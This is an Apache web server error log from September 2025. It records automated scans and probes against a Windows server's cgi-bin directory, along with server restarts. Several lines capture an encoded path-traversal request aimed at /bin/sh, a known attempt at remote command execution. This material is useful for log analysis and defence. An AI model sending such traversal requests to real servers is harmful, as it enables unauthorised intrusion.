[Mon Sep 01 19:05:20.001869 2025] [cgi:error] [pid 5044:tid 948] [client 204.76.203.155:50632] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 01 19:57:07.011482 2025] [cgi:error] [pid 5044:tid 1104] [client 204.76.203.155:59568] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 01 20:34:32.519246 2025] [cgi:error] [pid 5044:tid 1104] [client 204.76.203.155:58474] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 01 21:47:08.054343 2025] [cgi:error] [pid 5044:tid 1104] [client 167.94.138.176:52108] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon Sep 01 21:53:45.342262 2025] [cgi:error] [pid 5044:tid 1104] [client 162.62.213.187:42546] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Mon Sep 01 22:06:05.664364 2025] [cgi:error] [pid 5044:tid 948] [client 204.76.203.155:55356] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 01 22:45:00.013417 2025] [cgi:error] [pid 5044:tid 1104] [client 204.76.203.155:55338] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 01 23:51:18.666910 2025] [core:error] [pid 5044:tid 948] (20024)The given path is misformatted or contained invalid characters: [client 43.158.91.71:40902] AH00127: Cannot map GET /error/%3C%21-- HTTP/1.1 to file
[Mon Sep 01 23:57:51.839279 2025] [cgi:error] [pid 5044:tid 948] [client 66.132.153.56:35772] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue Sep 02 00:41:35.388132 2025] [cgi:error] [pid 5044:tid 948] [client 204.76.203.155:49060] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Sep 02 03:55:53.814704 2025] [cgi:error] [pid 5044:tid 948] [client 43.166.251.233:44272] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Tue Sep 02 07:54:32.417220 2025] [mpm_winnt:notice] [pid 3252:tid 756] AH00422: Parent: Received shutdown signal -- Shutting down the server.
[Tue Sep 02 07:54:34.463724 2025] [mpm_winnt:notice] [pid 5044:tid 624] AH00364: Child: All worker threads have exited.
[Tue Sep 02 07:54:42.774151 2025] [mpm_winnt:notice] [pid 3252:tid 756] AH00430: Parent: Child process 5044 exited successfully.
[Tue Sep 02 07:55:43.491841 2025] [mpm_winnt:notice] [pid 3600:tid 544] AH00455: Apache/2.4.46 (Win64) configured -- resuming normal operations
[Tue Sep 02 07:55:43.518769 2025] [mpm_winnt:notice] [pid 3600:tid 544] AH00456: Apache Lounge VS16 Server built: Dec 9 2020 13:42:35
[Tue Sep 02 07:55:43.518769 2025] [core:notice] [pid 3600:tid 544] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Tue Sep 02 07:55:43.519767 2025] [mpm_winnt:notice] [pid 3600:tid 544] AH00418: Parent: Created child process 4804
[Tue Sep 02 07:55:44.083261 2025] [mpm_winnt:notice] [pid 4804:tid 672] AH00354: Child: Starting 64 worker threads.
[Tue Sep 02 17:50:35.861314 2025] [core:error] [pid 4804:tid 1128] [client 50.117.21.19:51574] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Tue Sep 02 21:33:32.465205 2025] [core:error] [pid 4804:tid 1120] [client 91.99.211.200:42944] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Wed Sep 03 00:47:55.840488 2025] [cgi:error] [pid 4804:tid 1120] [client 206.168.34.43:44326] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed Sep 03 01:44:24.415121 2025] [cgi:error] [pid 4804:tid 1120] [client 162.142.125.204:44316] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed Sep 03 05:31:31.979962 2025] [cgi:error] [pid 4804:tid 1140] [client 167.94.145.102:33952] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed Sep 03 06:43:13.585966 2025] [core:error] [pid 4804:tid 1120] (20024)The given path is misformatted or contained invalid characters: [client 101.32.49.171:42412] AH00127: Cannot map GET /error/%3C%21-- HTTP/1.1 to file
[Wed Sep 03 09:22:30.767446 2025] [cgi:error] [pid 4804:tid 1140] [client 164.90.173.108:52168] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Wed Sep 03 09:24:25.525856 2025] [cgi:error] [pid 4804:tid 1136] [client 66.132.153.49:52842] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed Sep 03 10:27:08.709534 2025] [cgi:error] [pid 4804:tid 1128] [client 139.59.131.123:56466] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/authLogin.cgi
[Wed Sep 03 14:46:55.881273 2025] [cgi:error] [pid 4804:tid 1124] [client 167.94.145.110:48838] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed Sep 03 15:39:10.915832 2025] [cgi:error] [pid 4804:tid 1124] [client 87.120.191.13:37554] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Sep 03 21:07:30.111219 2025] [cgi:error] [pid 4804:tid 1124] [client 167.94.138.32:47186] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed Sep 03 21:26:22.222708 2025] [win32:error] [pid 4804:tid 1132] [client 196.251.73.152:59612] AH02102: C:/Apache24/cgi-bin/printenv.pl is not executable; ensure interpreted scripts have "#!" or "'!" first line
[Wed Sep 03 21:26:22.222708 2025] [cgi:error] [pid 4804:tid 1132] (9)Bad file descriptor: [client 196.251.73.152:59612] AH01222: don't know how to spawn child process: C:/Apache24/cgi-bin/printenv.pl
[Thu Sep 04 02:21:05.213250 2025] [core:error] [pid 4804:tid 1112] [client 43.225.53.200:55716] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Thu Sep 04 10:13:51.867166 2025] [mpm_winnt:notice] [pid 3600:tid 544] AH00422: Parent: Received shutdown signal -- Shutting down the server.
[Thu Sep 04 10:15:02.683115 2025] [core:warn] [pid 3424:tid 688] AH00098: pid file C:/Apache24/logs/httpd.pid overwritten -- Unclean shutdown of previous Apache run?
[Thu Sep 04 10:15:02.712452 2025] [mpm_winnt:notice] [pid 3424:tid 688] AH00455: Apache/2.4.46 (Win64) configured -- resuming normal operations
[Thu Sep 04 10:15:02.712452 2025] [mpm_winnt:notice] [pid 3424:tid 688] AH00456: Apache Lounge VS16 Server built: Dec 9 2020 13:42:35
[Thu Sep 04 10:15:02.712452 2025] [core:notice] [pid 3424:tid 688] AH00094: Command line: 'C:\\Apache24\\bin\\httpd.exe -d C:/Apache24'
[Thu Sep 04 10:15:02.713449 2025] [mpm_winnt:notice] [pid 3424:tid 688] AH00418: Parent: Created child process 3888
[Thu Sep 04 10:15:03.336787 2025] [mpm_winnt:notice] [pid 3888:tid 652] AH00354: Child: Starting 64 worker threads.
[Thu Sep 04 22:23:04.235993 2025] [cgi:error] [pid 3888:tid 1140] [client 167.94.138.190:39248] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri Sep 05 03:04:16.797583 2025] [cgi:error] [pid 3888:tid 1140] [client 199.45.155.85:37018] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri Sep 05 16:37:20.618091 2025] [cgi:error] [pid 3888:tid 1136] [client 45.148.10.203:35914] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Fri Sep 05 16:37:26.743639 2025] [core:error] [pid 3888:tid 928] (20024)The given path is misformatted or contained invalid characters: [client 45.148.10.203:46612] AH00127: Cannot map GET /error/%3C%21-- HTTP/1.1 to file
[Fri Sep 05 16:37:26.745717 2025] [mpm_winnt:error] [pid 3888:tid 4440] AH00326: Server ran out of threads to serve requests. Consider raising the ThreadsPerChild setting
[Fri Sep 05 16:37:48.345426 2025] [core:error] [pid 3888:tid 1132] (20024)The given path is misformatted or contained invalid characters: [client 45.148.10.203:42462] AH00127: Cannot map GET /modules/%3C/span%3E%3C/a%3E%3C/li%3Evertical-align:t/jquery.min.js HTTP/1.1 to file
[Fri Sep 05 16:37:48.349427 2025] [core:error] [pid 3888:tid 1104] (20024)The given path is misformatted or contained invalid characters: [client 45.148.10.203:42528] AH00127: Cannot map GET /modules/themselves,although%20hethat%20can%20betraditionalrole%20of%20theas%20a%20resultremoveChilddesigned%20bywest%20of%20theSome%20peopleproduction,side%20of%20thenewslettersused%20by%20thedown%20to%20theaccepted%20bylive%20in%20theattempts%20tooutside%20thefrequenciesHowever,%20inprogrammersat%20least%20inapproximatealthough%20itwas%20part%20ofand%20variousGovernor%20ofthe%20articleturned%20into%3E%3Ca%20href= HTTP/1.1 to file
[Fri Sep 05 16:37:48.355496 2025] [core:error] [pid 3888:tid 1040] (20024)The given path is misformatted or contained invalid characters: [client 45.148.10.203:42500] AH00127: Cannot map GET /introductionbelonging%20toclaimed%20thatconsequences%3Cmeta%20name= HTTP/1.1 to file
[Fri Sep 05 16:37:48.359485 2025] [core:error] [pid 3888:tid 1016] (20024)The given path is misformatted or contained invalid characters: [client 45.148.10.203:42540] AH00127: Cannot map GET /modules/%3Eus.js HTTP/1.1 to file
[Fri Sep 05 16:37:48.360482 2025] [core:error] [pid 3888:tid 1072] (20024)The given path is misformatted or contained invalid characters: [client 45.148.10.203:42518] AH00127: Cannot map GET /modules/%3Ca%20href= HTTP/1.1 to file
[Fri Sep 05 17:58:31.830132 2025] [core:error] [pid 3888:tid 1128] [client 94.74.164.120:60112] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Fri Sep 05 20:53:17.254454 2025] [cgi:error] [pid 3888:tid 988] [client 66.132.153.50:52242] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri Sep 05 21:19:37.420910 2025] [win32:error] [pid 3888:tid 1004] [client 196.251.73.250:57010] AH02102: C:/Apache24/cgi-bin/printenv.pl is not executable; ensure interpreted scripts have "#!" or "'!" first line
[Fri Sep 05 21:19:37.420910 2025] [cgi:error] [pid 3888:tid 1004] (9)Bad file descriptor: [client 196.251.73.250:57010] AH01222: don't know how to spawn child process: C:/Apache24/cgi-bin/printenv.pl
[Fri Sep 05 23:23:40.983617 2025] [cgi:error] [pid 3888:tid 1128] [client 167.94.146.60:39602] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat Sep 06 07:38:03.152232 2025] [cgi:error] [pid 3888:tid 1128] [client 34.79.212.94:38498] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat Sep 06 10:47:14.092980 2025] [cgi:error] [pid 3888:tid 1028] [client 206.168.34.92:45352] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat Sep 06 11:49:24.181718 2025] [cgi:error] [pid 3888:tid 536] [client 165.154.138.79:59144] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat Sep 06 12:24:55.452589 2025] [core:error] [pid 3888:tid 1036] [client 183.87.153.86:41512] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sat Sep 06 22:19:30.523380 2025] [cgi:error] [pid 3888:tid 552] [client 43.159.152.187:50632] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat Sep 06 23:05:16.725442 2025] [core:error] [pid 3888:tid 1004] [client 197.220.93.117:56240] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sat Sep 06 23:05:21.633990 2025] [win32:error] [pid 3888:tid 1088] [client 196.251.73.223:38972] AH02102: C:/Apache24/cgi-bin/printenv.pl is not executable; ensure interpreted scripts have "#!" or "'!" first line
[Sat Sep 06 23:05:21.633990 2025] [cgi:error] [pid 3888:tid 1088] (9)Bad file descriptor: [client 196.251.73.223:38972] AH01222: don't know how to spawn child process: C:/Apache24/cgi-bin/printenv.pl
[Sun Sep 07 04:39:46.885271 2025] [cgi:error] [pid 3888:tid 1072] [client 43.131.253.14:58496] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sun Sep 07 04:53:07.787034 2025] [cgi:error] [pid 3888:tid 1072] [client 66.132.153.54:45678] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun Sep 07 12:14:28.993848 2025] [cgi:error] [pid 3888:tid 1072] [client 89.248.172.16:40970] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sun Sep 07 13:53:04.878106 2025] [core:error] [pid 3888:tid 1004] [client 80.238.225.131:47780] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Sun Sep 07 18:46:01.129980 2025] [cgi:error] [pid 3888:tid 1072] [client 52.48.53.149:46386] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sun Sep 07 22:38:58.328125 2025] [cgi:error] [pid 3888:tid 1072] [client 71.6.158.166:37374] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Mon Sep 08 02:49:32.564218 2025] [core:error] [pid 3888:tid 988] [client 34.123.181.51:34710] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon Sep 08 03:09:34.183284 2025] [cgi:error] [pid 3888:tid 988] [client 167.94.145.110:42396] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon Sep 08 07:01:21.092646 2025] [cgi:error] [pid 3888:tid 988] [client 66.132.153.50:43130] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Mon Sep 08 09:49:37.941985 2025] [cgi:error] [pid 3888:tid 988] [client 196.251.84.66:36218] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 08 09:56:27.379440 2025] [cgi:error] [pid 3888:tid 1072] [client 37.60.141.158:19094] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 08 12:35:26.934656 2025] [core:error] [pid 3888:tid 536] [client 185.250.36.134:52818] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Mon Sep 08 13:33:12.635614 2025] [cgi:error] [pid 3888:tid 1072] [client 37.60.141.158:29408] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 08 17:20:42.699067 2025] [win32:error] [pid 3888:tid 1128] [client 196.251.72.5:43994] AH02102: C:/Apache24/cgi-bin/printenv.pl is not executable; ensure interpreted scripts have "#!" or "'!" first line
[Mon Sep 08 17:20:42.700061 2025] [cgi:error] [pid 3888:tid 1128] (9)Bad file descriptor: [client 196.251.72.5:43994] AH01222: don't know how to spawn child process: C:/Apache24/cgi-bin/printenv.pl
[Mon Sep 08 17:38:54.435268 2025] [cgi:error] [pid 3888:tid 1004] [client 37.60.141.158:7456] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 08 17:49:27.529395 2025] [cgi:error] [pid 3888:tid 1004] [client 37.60.141.158:14648] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Mon Sep 08 23:28:00.644543 2025] [cgi:error] [pid 3888:tid 1004] [client 196.251.84.66:50246] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Sep 09 07:46:39.837860 2025] [cgi:error] [pid 3888:tid 1004] [client 167.94.138.207:34232] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue Sep 09 07:56:48.971581 2025] [cgi:error] [pid 3888:tid 1108] [client 66.132.153.53:58002] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue Sep 09 08:02:19.664534 2025] [cgi:error] [pid 3888:tid 1128] [client 194.110.115.3:52212] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Tue Sep 09 08:04:39.145611 2025] [core:error] [pid 3888:tid 1088] (20024)The given path is misformatted or contained invalid characters: [client 45.84.107.54:22256] AH00127: Cannot map GET /introductionbelonging%20toclaimed%20thatconsequences%3Cmeta%20name= HTTP/1.1 to file
[Tue Sep 09 08:04:39.277757 2025] [core:error] [pid 3888:tid 1088] (20024)The given path is misformatted or contained invalid characters: [client 45.84.107.54:22256] AH00127: Cannot map GET /modules/themselves,although%20hethat%20can%20betraditionalrole%20of%20theas%20a%20resultremoveChilddesigned%20bywest%20of%20theSome%20peopleproduction,side%20of%20thenewslettersused%20by%20thedown%20to%20theaccepted%20bylive%20in%20theattempts%20tooutside%20thefrequenciesHowever,%20inprogrammersat%20least%20inapproximatealthough%20itwas%20part%20ofand%20variousGovernor%20ofthe%20articleturned%20into%3E%3Ca%20href= HTTP/1.1 to file
[Tue Sep 09 08:04:46.841365 2025] [core:error] [pid 3888:tid 1088] (20024)The given path is misformatted or contained invalid characters: [client 45.84.107.54:22256] AH00127: Cannot map GET /error/%3C%21-- HTTP/1.1 to file
[Tue Sep 09 13:51:56.507139 2025] [cgi:error] [pid 3888:tid 1092] [client 167.94.138.48:40484] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Tue Sep 09 17:35:55.120463 2025] [cgi:error] [pid 3888:tid 1108] [client 52.47.70.127:41314] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Tue Sep 09 18:05:56.409816 2025] [cgi:error] [pid 3888:tid 1072] [client 45.148.10.203:58050] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Tue Sep 09 18:06:33.251928 2025] [core:error] [pid 3888:tid 992] (20024)The given path is misformatted or contained invalid characters: [client 45.148.10.203:57250] AH00127: Cannot map GET /error/%3C%21-- HTTP/1.1 to file
[Tue Sep 09 18:09:12.450625 2025] [cgi:error] [pid 3888:tid 928] [client 167.94.146.59:42980] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Wed Sep 10 00:49:00.588844 2025] [core:error] [pid 3888:tid 1040] (20024)The given path is misformatted or contained invalid characters: [client 216.81.248.73:47106] AH00127: Cannot map GET /error/%3C%21-- HTTP/1.1 to file
[Wed Sep 10 00:49:03.353329 2025] [cgi:error] [pid 3888:tid 980] [client 216.81.248.73:42608] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Wed Sep 10 03:30:22.934228 2025] [cgi:error] [pid 3888:tid 536] [client 216.81.248.158:60206] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Wed Sep 10 03:30:30.610860 2025] [core:error] [pid 3888:tid 1048] (20024)The given path is misformatted or contained invalid characters: [client 216.81.248.158:32838] AH00127: Cannot map GET /error/%3C%21-- HTTP/1.1 to file
[Wed Sep 10 03:30:31.026837 2025] [core:error] [pid 3888:tid 992] (20024)The given path is misformatted or contained invalid characters: [client 216.81.248.158:60978] AH00127: Cannot map GET /modules/%3C/span%3E%3C/a%3E%3C/li%3Evertical-align:t/jquery.min.js HTTP/1.1 to file
[Wed Sep 10 03:30:35.223170 2025] [core:error] [pid 3888:tid 1052] (20024)The given path is misformatted or contained invalid characters: [client 216.81.248.158:54686] AH00127: Cannot map GET /introductionbelonging%20toclaimed%20thatconsequences%3Cmeta%20name= HTTP/1.1 to file
[Wed Sep 10 03:30:35.237268 2025] [core:error] [pid 3888:tid 1060] (20024)The given path is misformatted or contained invalid characters: [client 216.81.248.158:54672] AH00127: Cannot map GET /modules/themselves,although%20hethat%20can%20betraditionalrole%20of%20theas%20a%20resultremoveChilddesigned%20bywest%20of%20theSome%20peopleproduction,side%20of%20thenewslettersused%20by%20thedown%20to%20theaccepted%20bylive%20in%20theattempts%20tooutside%20thefrequenciesHowever,%20inprogrammersat%20least%20inapproximatealthough%20itwas%20part%20ofand%20variousGovernor%20ofthe%20articleturned%20into%3E%3Ca%20href= HTTP/1.1 to file
[Wed Sep 10 03:30:35.257485 2025] [core:error] [pid 3888:tid 1076] (20024)The given path is misformatted or contained invalid characters: [client 216.81.248.158:54656] AH00127: Cannot map GET /modules/%3Eus.js HTTP/1.1 to file
[Wed Sep 10 03:30:40.244342 2025] [core:error] [pid 3888:tid 1072] (20024)The given path is misformatted or contained invalid characters: [client 216.81.248.158:55038] AH00127: Cannot map GET /modules/%3Ca%20href= HTTP/1.1 to file
[Wed Sep 10 18:46:26.461014 2025] [cgi:error] [pid 3888:tid 980] [client 206.168.34.35:36634] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Thu Sep 11 00:55:52.918442 2025] [cgi:error] [pid 3888:tid 1000] [client 66.132.153.59:58500] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Thu Sep 11 14:09:26.191321 2025] [cgi:error] [pid 3888:tid 1096] [client 206.168.34.117:60424] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Thu Sep 11 15:39:29.067249 2025] [core:error] [pid 3888:tid 1096] [client 42.192.3.101:63694] AH00126: Invalid URI in request 'bin/sh' 'POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1'
[Thu Sep 11 21:07:33.400924 2025] [cgi:error] [pid 3888:tid 1136] [client 43.130.106.18:43428] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Thu Sep 11 21:14:27.060976 2025] [cgi:error] [pid 3888:tid 1136] [client 167.94.146.54:58826] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri Sep 12 10:18:32.693821 2025] [cgi:error] [pid 3888:tid 1128] [client 43.157.38.228:50470] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Fri Sep 12 11:44:18.118972 2025] [core:error] [pid 3888:tid 1136] (20024)The given path is misformatted or contained invalid characters: [client 43.164.196.57:50748] AH00127: Cannot map GET /error/%3C%21-- HTTP/1.1 to file
[Fri Sep 12 21:49:54.881450 2025] [cgi:error] [pid 3888:tid 1136] [client 66.132.153.133:57118] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Fri Sep 12 23:00:04.294483 2025] [cgi:error] [pid 3888:tid 1136] [client 66.132.153.56:55616] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat Sep 13 01:51:28.739222 2025] [cgi:error] [pid 3888:tid 1128] [client 167.94.138.184:44058] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat Sep 13 15:31:34.088260 2025] [cgi:error] [pid 3888:tid 1128] [client 199.45.154.143:50364] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sat Sep 13 23:51:14.278263 2025] [cgi:error] [pid 3888:tid 1136] [client 162.142.125.195:46746] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun Sep 14 01:02:58.028415 2025] [cgi:error] [pid 3888:tid 1136] [client 167.94.145.104:51674] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
[Sun Sep 14 07:00:14.727405 2025] [cgi:error] [pid 3888:tid 1136] [client 66.132.153.52:36504] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://88.147.142.161:80/cgi-bin
